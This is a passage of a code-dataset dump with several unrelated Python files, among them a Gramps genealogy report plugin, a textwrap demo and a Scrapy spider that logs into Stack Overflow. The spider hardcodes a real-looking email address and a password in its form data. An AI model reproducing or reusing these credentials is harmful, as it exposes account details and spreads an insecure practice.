in args.plot_layer_names:\n#     clean_act = _maybe_slice(record[layer_name + '_forward_input:0'])\n#     fgsm_act = _maybe_slice(record[layer_name + f'_forward_input:0-@{adv_tag}'])\n#\n#     plot(clean_act, fgsm_act, layer_name, reference_stats=ref_stats, rank_by_stats_loss=True, max_ratio=False)\n#     plt.waitforbuttonpress()\n","sub_path":"adversarial_compare.py","file_name":"adversarial_compare.py","file_ext":"py","file_size_in_byte":39939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"202104313","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\nUsage of the textwrap module\n\nThe standard module textwrap handles the case where multi-line strings appear inside several levels of indentation\n\"\"\"\n\nfrom textwrap import dedent\n\n\ndef basic_demo():\n    \"\"\"Written this way, the output string includes the indentation spaces on the left\"\"\"\n    msg = ''\n    if True:\n        msg = \"\"\"\n        Welcome, today's movie list:\n        - Jaw (1975)\n        - The Shining (1980)\n        - Saw (2004)\"\"\"\n    print(msg)\n\n\ndef basic_demo2():\n    \"\"\"Written this way, the indentation spaces on the left are not included\"\"\"\n    msg = ''\n    if True:\n        msg = dedent(\"\"\"\\\n        Welcome, today's movie list:\n        - Jaw (1975)\n        - The Shining (1980)\n        - Saw (2004)\"\"\")\n    print(msg)\n\n\ndef main():\n    basic_demo()\n    basic_demo2()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"language/python/modules/System/textwrap/textwrap_module.py","file_name":"textwrap_module.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"553200271","text":"\n\nfrom xai.brain.wordbase.nouns._chiropractor import _CHIROPRACTOR\n\n#class header\nclass _CHIROPRACTORS(_CHIROPRACTOR, ):\n\tdef __init__(self,): \n\t\t_CHIROPRACTOR.__init__(self)\n\t\tself.name = \"CHIROPRACTORS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"chiropractor\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_chiropractors.py","file_name":"_chiropractors.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"274240326","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Gramps - a GTK+/GNOME based genealogy program\n#\n# Copyright (C) 2008,2011 Gary Burton\n# Copyright (C) 2010 Jakim Friant\n# Copyright (C) 2011 Heinz Brinker\n# Copyright (C) 2013-2014 Paul Franklin\n# Copyright (C) 2015 Hans Ulrich Frink\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\"\"\"ledigquote Report\"\"\"\n\n#------------------------------------------------------------------------\n#\n# python modules\n#\n#------------------------------------------------------------------------\n\n#------------------------------------------------------------------------\n#\n# gramps modules\n#\n#------------------------------------------------------------------------\nfrom gramps.gen.const import GRAMPS_LOCALE as glocale\n_ = glocale.translation.gettext\nfrom gramps.gen.plug.menu import (FilterOption, PlaceListOption,\n EnumeratedListOption, BooleanOption)\nfrom gramps.gen.plug.report import Report\nfrom gramps.gen.plug.report import MenuReportOptions\nfrom gramps.gen.plug.report import stdoptions\nfrom gramps.gen.plug.docgen import (IndexMark, FontStyle, ParagraphStyle,\n TableStyle, TableCellStyle,\n FONT_SANS_SERIF, FONT_SERIF, \n INDEX_TYPE_TOC, PARA_ALIGN_CENTER)\nfrom gramps.gen.proxy import PrivateProxyDb\nfrom gramps.gen.sort import Sort\nfrom gramps.gen.utils.location import get_main_location\nfrom gramps.gen.utils.db import get_birth_or_fallback, get_death_or_fallback\nfrom gramps.gen.display.place import displayer as place_displayer\nfrom gramps.gen.lib import PlaceType\nfrom gramps.gen.lib import NameType, EventRoleType, EventType\nfrom gramps.gen.plug.report import utils as ReportUtils\nfrom gramps.gen.config import config\n#from gramps.gen.datehandler import get_date\n\nfrom collections import OrderedDict\nfrom operator import itemgetter\n\ncal = config.get('preferences.calendar-format-report')\n\nclass ledigquote(Report):\n \"\"\"\n ledigquote Report class\n \"\"\"\n def __init__(self, database, options, user):\n \"\"\"\n Create the ledigquote Report object produces the ledigquote report.\n \n The arguments are:\n\n database - the GRAMPS database instance\n options - instance of the Options class for this report\n user - instance of a gen.user.User class\n\n This report needs the following parameters (class variables)\n that come in the options class.\n \n places - List of places to report on.\n# classwidth - classwidth of report, person or event\n incpriv - Whether to include private data\n\n \"\"\"\n\n Report.__init__(self, database, options, user)\n\n self._user = user\n menu = options.menu\n places = menu.get_option_by_name('places').get_value()\n self.classwidth = menu.get_option_by_name('classwidth').get_value()\n self.incpriv = menu.get_option_by_name('incpriv').get_value()\n\n self.set_locale(menu.get_option_by_name('trans').get_value())\n\n name_format = menu.get_option_by_name(\"name_format\").get_value()\n if name_format != 0:\n self._name_display.set_default_format(name_format)\n self._nd = self._name_display\n \n if self.incpriv:\n self.database = database\n else:\n self.database = PrivateProxyDb(database)\n\n filter_option = menu.get_option_by_name('filter')\n self.filter = filter_option.get_filter()\n self.sort = Sort(self.database)\n\n if self.filter.get_name() != '':\n # Use the selected filter to provide a list of place handles\n plist = self.database.iter_place_handles()\n self.place_handles = self.filter.apply(self.database, plist)\n else:\n # Use the place handles selected without a filter\n self.place_handles = self.__get_place_handles(places)\n\n 
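# sort the collected places by title so the report order is stable\n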
        self.place_handles.sort(key=self.sort.by_place_title_key)\n    \n    def write_report(self):\n        \"\"\"\n        The routine that actually creates the report.\n        At this point, the document is opened and ready for writing.\n        \"\"\"\n\n        # Write the title line. Set an INDEX marker so that this section will be\n        # identified as a major category if this is included in a Book report.\n\n        title = self._(\"Ledigenquote und Verheiratetenanteile \")\n        mark = IndexMark(title, INDEX_TYPE_TOC, 1) \n        self.doc.start_paragraph(\"PLC-ReportTitle\")\n        self.doc.write_text(title, mark)\n        self.doc.end_paragraph()\n\n        self.doc.start_paragraph(\"PLC-Section\")\n        self.doc.write_text(\"Enthält alle Personen, die in diesem Ort geboren oder getauft wurden\")\n        self.doc.end_paragraph()\n        self.doc.start_table(\"LEQUODETTable\", \"SRC-LEQUODETTable\")\n        column_titles = [_(\"name\"), _(\"ID\"), _(\"m/w\"), _(\"birth\"), _(\"death\"), _(\"marriage\"), _(\"date\"), _(\"weitere Heiraten\"), _(\"Alter Tod\"), _(\"Alter Hochzeit\"), _(\"place\"), _(\"LNR\") ] \n        i = 0\n        self.doc.start_row()\n        for title in column_titles:\n            self.doc.start_cell(\"SRC-TableColumn\")\n            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n            self.doc.write_text(title)\n            self.doc.end_paragraph()\n            self.doc.end_cell()\n        self.doc.end_row()\n\n        # keep the person list so the statistics table below can reuse it\n        pdet_list = self.__write_data()\n\n        self.doc.end_table()\n        \n# Men's table\n        self.doc.start_paragraph(\"PLC-Section\")\n        self.doc.write_text(\"Ledigenquote und Verheiratetenanteile bei Männern\")\n        self.doc.end_paragraph()\n        self.doc.start_table(\"LEQUODETTable\", \"SRC-LEQUODETTable\")\n        column_titles = [_(\"cat\"), _(\"ID\"), _(\"m/w\"), _(\"birth\"), _(\"death\"), _(\"marriage\"), _(\"date\"), _(\"weitere Heiraten\"), _(\"Alter Tod\"), _(\"Alter Hochzeit\"), _(\"place\"), _(\"LNR\") ] \n        i = 0\n        self.doc.start_row()\n        for title in column_titles:\n            self.doc.start_cell(\"SRC-TableColumn\")\n            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n            self.doc.write_text(title)\n            self.doc.end_paragraph()\n            self.doc.end_cell()\n        self.doc.end_row()\n\n        self.__write_statistics(pdet_list)\n\n        self.doc.end_table()\n\n    def __write_data(self):\n        \"\"\"\n        This procedure writes out each of the families related to the place\n        \"\"\"\n        i = 0\n        iw = 0\n        ifam = 0\n        p_set=set()\n        pdet_list=[]\n        QUAL_ESTIMATED = 1\n        gender_dict ={0:\"w\",1:\"m\", 2:\"u\"}\n\n\n        for person in self.database.iter_people():\n            birth_event = get_birth_or_fallback(self.database, person)\n            b_year = 0\n            alt_tod = 0\n            b_role = \"ROLLE\"\n            if birth_event:\n                if birth_event.get_place_handle() in self.place_handles:\n                    birth_obj = birth_event.get_date_object()\n                    if birth_obj.get_quality() is not QUAL_ESTIMATED:\n                        place_d = place_displayer.display_event(self.database, birth_event) \n                        person_name = person.get_primary_name().get_surname()\n                        person_ID = person.get_gramps_id()\n                        gender = gender_dict[person.get_gender()]\n\n                        m_date = self._get_date(birth_obj)\n                        # if birth_obj.get_quality() is not QUAL_ESTIMATED:\n                        b_year = birth_obj.get_year()\n                        # b_role = \"ROLLE \"+ str(birth_event.role)\n                        # b_place = \n                        death_event = get_death_or_fallback(self.database, person)\n                        d_year = 0\n                        if death_event:\n                            death_obj = death_event.get_date_object()\n                            # if death_obj.get_quality() is not QUAL_ESTIMATED:\n                            d_year = death_obj.get_year() \n                            alt_tod = d_year - b_year\n                        m_year = 0 \n                        \n                        alt_marr = 0\n                        \n                        m_list=[]\n                        # m_date = \"\"\n                        m_wm = \"WEIT\"\n                        for family_handle in person.get_family_handle_list():\n                            # print(family_handle)\n                            family = self.database.get_family_from_handle(family_handle)\n                            \n                            for fam_event_ref in 
family.get_event_ref_list():\n # print(fam_event_ref)\n if fam_event_ref:\n fam_event = self.database.get_event_from_handle(fam_event_ref.ref)\n if fam_event.type == EventType.MARRIAGE:\n print(fam_event.type)\n m_list.append(fam_event.get_date_object().get_year())\n # print(fam_event.get_date_object().get_year())\n # m_year = fam_event.get_date_object().get_year()\n if len(m_list)>0:\n m_year = min(m_list)\n alt_marr = m_year - b_year\n # else:\n # m_year = 0 \n for m in m_list:\n m_wm = m_wm+\" \"+str(m) \n \n \n # person_details = [ person, person_name, person_ID, gender, b_year, d_year, m_year, b_role, m_date, diff,place_d]\n person_details = [ person, person_name, person_ID, gender, b_year, d_year, m_year, m_date, m_wm, alt_tod, alt_marr, place_d]\n \n pdet_list.append(person_details)\n i=1\n for pn in pdet_list:\n self.doc.start_row()\n \n# self.doc.start_cell(\"SRC-TableColumn\")\n# self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# ST = \"PN\"+ str(pn[0])\n# self.doc.write_text(_(\"%s\") % ST)\n# # self.doc.write_text(_(\"Hallo0\"))\n# self.doc.end_paragraph()\n# self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[1])\n # self.doc.write_text(_(\"Hallo1\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[2])\n # self.doc.write_text(_(\"Hallo2\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[3])\n # self.doc.write_text(_(\"Hallo3\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[4])\n # self.doc.write_text(_(\"Hallo4\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[5])\n # self.doc.write_text(_(\"Hallo5\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[6])\n # self.doc.write_text(_(\"Hallo6\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[7])\n # self.doc.write_text(_(\"Hallo7\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[8])\n # self.doc.write_text(_(\"Hallo8\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[9])\n # self.doc.write_text(_(\"Hallo9\"))\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n \n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n# diff= pn[6] - pn[4]\n self.doc.write_text(_(\"%s\") % pn[10])\n# self.doc.write_text(diff)\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n self.doc.start_cell(\"SRC-TableColumn\")\n self.doc.start_paragraph(\"SRC-ColumnTitle\")\n self.doc.write_text(_(\"%s\") % pn[11])\n self.doc.end_paragraph()\n self.doc.end_cell()\n\n 
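# last column: running row number (LNR)\n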
            self.doc.start_cell(\"SRC-TableColumn\")\n            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n            self.doc.write_text(_(\"%s\") % i)\n            # self.doc.write_text(i)\n            # self.doc.write_text(_(\"LNR\"))\n            self.doc.end_paragraph()\n            self.doc.end_cell()\n            i +=1\n\n\n            self.doc.end_row()\n\n        # hand the collected person details back to write_report for the statistics table\n        return pdet_list\n\n#########################\n    def __write_statistics(self, pdet_list):\n        \"\"\"\n        This procedure writes out the statistics derived from the collected person list\n        \"\"\"\n#  build classes\n        #year_list = list(pdet_list[4])\n        print(min(p[4] for p in pdet_list))  # earliest recorded birth year\n        #cm=min()\n#        i=1\n#        for pn in pdet_list:\n#            self.doc.start_row()\n#            \n##            self.doc.start_cell(\"SRC-TableColumn\")\n##            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n##            ST = \"PN\"+ str(pn[0])\n##            self.doc.write_text(_(\"%s\") % ST)\n##            # self.doc.write_text(_(\"Hallo0\"))\n##            self.doc.end_paragraph()\n##            self.doc.end_cell()\n#            \n#            self.doc.start_cell(\"SRC-TableColumn\")\n#            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n#            self.doc.write_text(_(\"%s\") % pn[1])\n#            # self.doc.write_text(_(\"Hallo1\"))\n#            self.doc.end_paragraph()\n#            self.doc.end_cell()\n#            \n#            self.doc.start_cell(\"SRC-TableColumn\")\n#            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n#            self.doc.write_text(_(\"%s\") % pn[2])\n#            # self.doc.write_text(_(\"Hallo2\"))\n#            self.doc.end_paragraph()\n#            self.doc.end_cell()\n#            \n#            self.doc.start_cell(\"SRC-TableColumn\")\n#            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n#            self.doc.write_text(_(\"%s\") % pn[3])\n#            # self.doc.write_text(_(\"Hallo3\"))\n#            self.doc.end_paragraph()\n#            self.doc.end_cell()\n#            \n#            self.doc.start_cell(\"SRC-TableColumn\")\n#            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n#            self.doc.write_text(_(\"%s\") % pn[4])\n#            # self.doc.write_text(_(\"Hallo4\"))\n#            self.doc.end_paragraph()\n#            self.doc.end_cell()\n#            \n#            self.doc.start_cell(\"SRC-TableColumn\")\n#            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n#            self.doc.write_text(_(\"%s\") % pn[5])\n#            # self.doc.write_text(_(\"Hallo5\"))\n#            self.doc.end_paragraph()\n#            self.doc.end_cell()\n#            \n#            self.doc.start_cell(\"SRC-TableColumn\")\n#            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n#            self.doc.write_text(_(\"%s\") % pn[6])\n#            # self.doc.write_text(_(\"Hallo6\"))\n#            self.doc.end_paragraph()\n#            self.doc.end_cell()\n#\n#            self.doc.start_cell(\"SRC-TableColumn\")\n#            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n#            self.doc.write_text(_(\"%s\") % pn[7])\n#            # self.doc.write_text(_(\"Hallo7\"))\n#            self.doc.end_paragraph()\n#            self.doc.end_cell()\n#\n#            self.doc.start_cell(\"SRC-TableColumn\")\n#            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n#            self.doc.write_text(_(\"%s\") % pn[8])\n#            # self.doc.write_text(_(\"Hallo8\"))\n#            self.doc.end_paragraph()\n#            self.doc.end_cell()\n#\n#            self.doc.start_cell(\"SRC-TableColumn\")\n#            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n#            self.doc.write_text(_(\"%s\") % pn[9])\n#            # self.doc.write_text(_(\"Hallo9\"))\n#            self.doc.end_paragraph()\n#            self.doc.end_cell()\n#\n#            \n#            self.doc.start_cell(\"SRC-TableColumn\")\n#            self.doc.start_paragraph(\"SRC-ColumnTitle\")\n##            diff= pn[6] - pn[4]\n#            self.doc.write_text(_(\"%s\") % pn[10])\n##            self.doc.write_text(diff)\n#            self.doc.end_paragraph()\n        #    self.doc.end_cell()\n        #\n        #    self.doc.start_cell(\"SRC-TableColumn\")\n        #    self.doc.start_paragraph(\"SRC-ColumnTitle\")\n        #    self.doc.write_text(_(\"%s\") % pn[11])\n        #    self.doc.end_paragraph()\n        #    self.doc.end_cell()\n        #\n        #    self.doc.start_cell(\"SRC-TableColumn\")\n        #    self.doc.start_paragraph(\"SRC-ColumnTitle\")\n        #    self.doc.write_text(_(\"%s\") % i)\n        ##    self.doc.write_text(i)\n        #    # self.doc.write_text(_(\"LNR\"))\n        #    self.doc.end_paragraph()\n        #    self.doc.end_cell()\n        #    i +=1\n        #\n        #\n        #    self.doc.end_row()\n        #\n#########################\n    \n    def __format_date(self, date_object):\n        if not date_object: return\n        d=date_object.get_day() \n        m=date_object.get_month()\n        y=date_object.get_year()\n        if (d == 0) and (m == 0):\n            date_f = (\" %s\" % y)\n        elif (d == 0) and not (m == 0):\n            date_f = (\" %s.%s\" % (m, y)) \n        else: \n            date_f = (\" %s.%s.%s\" % (d, m, y)) \n        return date_f \n    \n\n    \n    def __get_place_handles(self, places):\n        \"\"\"\n        This procedure converts a string of place GIDs to a list of handles\n        \"\"\"\n        place_handles = [] \n        for place_gid in places.split():\n            place = self.database.get_place_from_gramps_id(place_gid)\n            if place is not None:\n                place_handles.append(place.get_handle())\n\n        return place_handles\n    \n#------------------------------------------------------------------------\n#\n# ledigquoteOptions\n#\n#------------------------------------------------------------------------\nclass ledigquoteOptions(MenuReportOptions):\n\n    \"\"\"\n    Defines options and provides handling interface.\n    \"\"\"\n\n    def __init__(self, name, database):\n        MenuReportOptions.__init__(self, name, database)\n    \n    def add_menu_options(self, menu):\n        \"\"\"\n        Add options to the menu for the place report.\n        \"\"\"\n        category_name = _(\"Report Options\")\n\n        # Reload filters to pick any new ones\n        CustomFilters = None\n        from gramps.gen.filters import CustomFilters, GenericFilter\n\n        opt = FilterOption(_(\"Select using filter\"), 0)\n        opt.set_help(_(\"Select places using a filter\"))\n        filter_list = []\n        filter_list.append(GenericFilter())\n        filter_list.extend(CustomFilters.get_filters('Place'))\n        opt.set_filters(filter_list)\n        menu.add_option(category_name, \"filter\", opt)\n\n        stdoptions.add_name_format_option(menu, category_name)\n\n        places = PlaceListOption(_(\"Select places individually\"))\n        places.set_help(_(\"List of places to report on\"))\n        menu.add_option(category_name, \"places\", places)\n\n        classwidth = EnumeratedListOption(_(\"Class width\"), \"classwidth\")\n        classwidth.set_items([\n                (\"10 Years\", _(\"10 Years\")),\n                (\"20 Years\", _(\"20 Years\"))])\n        classwidth.set_help(_(\"Class width for the analysis\"))\n        menu.add_option(category_name, \"classwidth\", classwidth)\n\n        incpriv = BooleanOption(_(\"Include private data\"), True)\n        incpriv.set_help(_(\"Whether to include private data\"))\n        menu.add_option(category_name, \"incpriv\", incpriv)\n    \n        stdoptions.add_localization_option(menu, category_name)\n\n    def make_default_style(self, default_style):\n        \"\"\"\n        Make the default output style for the Place report.\n        \"\"\"\n        self.default_style = default_style\n        self.__report_title_style()\n        self.__source_title_style()\n        self.__source_details_style()\n        self.__citation_title_style()\n        self.__column_title_style()\n        self.__column_title_head_style()\n        self.__section_style()\n        self.__LEQUODET_table_style()\n        self.__details_style()\n        self.__cell_style()\n        self.__table_column_style()\n        self.__report_footer_style()\n\n\n    def __report_footer_style(self):\n        \"\"\"\n        Define the style used for the report footer\n        \"\"\" \n        \n        font = FontStyle()\n        font.set_size(8)\n        para = ParagraphStyle()\n        para.set_font(font)\n        para.set_alignment(PARA_ALIGN_CENTER)\n        para.set_top_border(True)\n        para.set_top_margin(ReportUtils.pt2cm(8))\n        para.set_description(_('The style used for the footer.'))\n        self.default_style.add_paragraph_style('SRC-Footer', para)\n    \n    def __report_title_style(self):\n        \"\"\"\n        Define the style used for the report title\n        
\"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=16, bold=1)\n para = ParagraphStyle()\n para.set_font(font)\n para.set_header_level(1)\n para.set_top_margin(0.25)\n para.set_bottom_margin(0.25)\n para.set_alignment(PARA_ALIGN_CENTER) \n para.set_description(_('The style used for the title of the report.'))\n self.default_style.add_paragraph_style(\"PLC-ReportTitle\", para)\n\n def __source_title_style(self):\n \"\"\"\n Define the style used for the source title\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=12, italic=0, bold=1)\n para = ParagraphStyle()\n para.set_font(font)\n para.set_header_level(2)\n para.set(first_indent=0.0, lmargin=0.0)\n para.set_top_margin(0.75)\n para.set_bottom_margin(0.25) \n para.set_description(_('The style used for source title.'))\n self.default_style.add_paragraph_style(\"SRC-SourceTitle\", para)\n \n def __citation_title_style(self):\n \"\"\"\n Define the style used for the citation title\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=12, italic=0, bold=1)\n para = ParagraphStyle()\n para.set_font(font)\n para.set_header_level(3)\n para.set(first_indent=0.0, lmargin=0.0)\n para.set_top_margin(0.75)\n para.set_bottom_margin(0.0) \n para.set_description(_('The style used for citation title.'))\n self.default_style.add_paragraph_style(\"SRC-CitationTitle\", para)\n\n def __source_details_style(self):\n \"\"\"\n Define the style used for the place details\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=10)\n para = ParagraphStyle()\n para.set_font(font)\n para.set(first_indent=0.0, lmargin=0.0)\n para.set_description(_('The style used for Source details.'))\n self.default_style.add_paragraph_style(\"PLC-SourceDetails\", para)\n\n def __column_title_style(self):\n \"\"\"\n Define the style used for the event table column title\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=10, bold=1)\n para = ParagraphStyle()\n para.set_font(font)\n para.set(first_indent=0.0, lmargin=0.0)\n para.set_description(_('The style used for a column title.'))\n self.default_style.add_paragraph_style(\"SRC-ColumnTitle\", para)\n\n def __column_title_head_style(self):\n \"\"\"\n Define the style used for the event table column title\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=10, bold=1)\n para = ParagraphStyle()\n para.set_font(font)\n para.set_header_level(3)\n para.set(first_indent=0.0, lmargin=0.0)\n para.set_description(_('The style used for a column title incl headerlevel.'))\n self.default_style.add_paragraph_style(\"SRC-ColumnTitleHead\", para)\n\n\n def __section_style(self):\n \"\"\"\n Define the style used for each section\n \"\"\"\n font = FontStyle()\n font.set(face=FONT_SERIF, size=10, italic=0, bold=0)\n para = ParagraphStyle()\n para.set_font(font)\n# para.set(first_indent=-1.5, lmargin=1.5)\n para.set(first_indent=0.0, lmargin=0.0)\n\n para.set_top_margin(0.5)\n para.set_bottom_margin(0.25) \n para.set_description(_('The style used for each section.'))\n self.default_style.add_paragraph_style(\"PLC-Section\", para)\n\n def __LEQUODET_table_style(self):\n \"\"\"\n Define the style used for event table\n \"\"\"\n table = TableStyle()\n table.set_width(100)\n table.set_columns(14)\n table.set_column_width(0, 8)\n table.set_column_width(1, 3)\n table.set_column_width(2, 6)\n table.set_column_width(3, 6)\n table.set_column_width(4, 6)\n table.set_column_width(5, 6)\n table.set_column_width(6, 6)\n table.set_column_width(7, 12)\n table.set_column_width(8, 6)\n 
table.set_column_width(9, 30)\n        table.set_column_width(10, 5)\n\n        self.default_style.add_table_style(\"SRC-LEQUODETTable\", table) \n\n    def __details_style(self):\n        \"\"\"\n        Define the style used for person and event details\n        \"\"\"\n        font = FontStyle()\n        font.set(face=FONT_SERIF, size=10)\n        para = ParagraphStyle()\n        para.set_font(font)\n        para.set_description(_('The style used for event and person details.'))\n        self.default_style.add_paragraph_style(\"PLC-Details\", para)\n\n    def __cell_style(self):\n        \"\"\"\n        Define the style used for cells in the event table\n        \"\"\"\n        cell = TableCellStyle()\n        self.default_style.add_cell_style(\"SRC-Cell\", cell)\n\n    def __table_column_style(self):\n        \"\"\"\n        Define the style used for event table columns\n        \"\"\"\n        cell = TableCellStyle()\n        cell.set_bottom_border(1)\n        self.default_style.add_cell_style('SRC-TableColumn', cell)\n    \n","sub_path":"MYtextreport/ledigquote-v3.py","file_name":"ledigquote-v3.py","file_ext":"py","file_size_in_byte":27524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"430943515","text":"from scrapy.spiders import Spider\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request, FormRequest\n\n\nclass SteamUrls(Spider):\n    name = \"stack_spider\"\n    start_urls = ['https://stackoverflow.com/']\n\n    headers = {\n        \"host\": \"cdn.sstatic.net\",\n        \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n        \"Accept-Encoding\": \"gzip, deflate, br\",\n        \"Accept-Language\": \"en-US,en;q=0.5\",\n        \"Connection\": \"keep-alive\",\n        \"Content-Type\": \" application/x-www-form-urlencoded; charset=UTF-8\",\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0\"\n    }\n\n    # override the Spider method to issue a custom request; on success the callback is invoked\n    def start_requests(self):\n        return [Request(\"https://stackoverflow.com/users/login\",\n                        meta={\n                            # 'dont_redirect': True,\n                            # 'handle_httpstatus_list': [302],\n                            'cookiejar': 1},\n                        callback=self.post_login)]  # meta added\n\n    # FormRequest\n\n    def post_login(self, response):\n        # after requesting the page, extract the hidden token fields it contains, needed to submit the form successfully\n        fkey = Selector(response).xpath('//input[@name=\"fkey\"]/@value').extract()[0]\n        ssrc = Selector(response).xpath('//input[@name=\"ssrc\"]/@value').extract()[0]\n        print(fkey)\n        print(ssrc)\n        # FormRequest.from_response is a function provided by Scrapy for posting forms\n        # after a successful login, the after_login callback is invoked\n        return [FormRequest.from_response(response,\n                                          meta={\n                                              # 'dont_redirect': True,\n                                              # 'handle_httpstatus_list': [302],\n                                              'cookiejar': response.meta['cookiejar']},  # note how the cookiejar is carried over here\n                                          headers=self.headers,\n                                          formdata={\n                                              \"fkey\": fkey,\n                                              \"ssrc\": ssrc,\n                                              \"email\": \"1045608243@qq.com\",\n                                              \"password\": \"12345\",\n                                              \"oauth_version\": \"\",\n                                              \"oauth_server\": \"\",\n                                              \"openid_username\": \"\",\n                                              \"openid_identifier\": \"\"\n                                          },\n                                          callback=self.after_login,\n                                          dont_filter=True\n                                          )]\n\n    def after_login(self, response):\n        filename = \"1.html\"\n        with open(filename, 'wb') as fp:\n            fp.write(response.body)","sub_path":"Scrapy/zyd/zyd/spiders/get_detail_table.py","file_name":"get_detail_table.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"532345237","text":"# Copyright (c) 2011-2020 Eric Froemling\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, 
publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n# -----------------------------------------------------------------------------\n\"\"\"Provides a score screen for coop games.\"\"\"\n# pylint: disable=too-many-lines\n\nfrom __future__ import annotations\n\nimport random\nfrom typing import TYPE_CHECKING\n\nimport _ba\nimport ba\nfrom ba.internal import get_achievements_for_coop_level\nfrom bastd.actor.text import Text\nfrom bastd.actor.zoomtext import ZoomText\n\nif TYPE_CHECKING:\n from typing import Optional, Tuple, List, Dict, Any, Sequence\n from bastd.ui.store.button 